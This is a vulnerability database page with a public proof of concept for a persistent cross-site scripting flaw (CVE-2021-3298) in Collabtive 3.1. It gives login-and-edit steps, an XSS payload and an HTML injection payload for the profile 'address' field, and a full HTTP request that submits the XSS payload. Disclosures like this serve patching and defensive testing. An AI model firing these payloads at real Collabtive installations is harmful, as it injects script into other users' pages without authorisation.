Vulners
Lucene search
Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Collabtive Cross-Site Scripting Vulnerability | 29 Jan 202100:00 | – | cnnvd |
 | CVE-2021-3298 | 29 Jan 202105:27 | – | cve |
 | CVE-2021-3298 | 29 Jan 202105:27 | – | cvelist |
 | EUVD-2021-26632 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-3298 | 29 Jan 202106:15 | – | nvd |
 | CVE-2021-3298 | 29 Jan 202106:15 | – | osv |
| UBUNTU-CVE-2021-3298 | 29 Jan 202106:15 | – | osv |
 | Cross site scripting | 29 Jan 202106:15 | – | prion |
 | CVE-2021-3298 | 22 May 202518:38 | – | redhatcve |
 | CVE-2021-3298 | 29 Jan 202106:15 | – | ubuntucve |
10
# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Date: 2021-01-23
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
# CVE: CVE-2021-3298
==> Tutorial <==
1- Login to your account.
2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
- You will see the executed HTML payload at there. (HTML Injection)
- You will see the executed XSS payload at profile edit section. (XSS)
==> Executed Payloads <==
XSS Payload ==> " onfocus="alert(1)" autofocus="
HTML Payload ==> <h1>DehaBerkinBir</h1>
==> HTTP Request <==
POST /manageuser.php?action=edit HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/manageuser.php?action=editform&id=1
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
Content-Length: 2327
Connection: close
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
Upgrade-Insecure-Requests: 1
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="name"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="file-avatar"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="company"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="web"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel1"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel2"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address1"
" onfocus="alert(1)" autofocus="
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="zip"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address2"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="country"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="state"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="gender"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="locale"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="admin"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="oldpass"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="newpass"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="repeatpass"
-----------------------------12097618915709137911841560297--Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jan 2021 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 23.5
CVSS 3.15.4
EPSS0.00218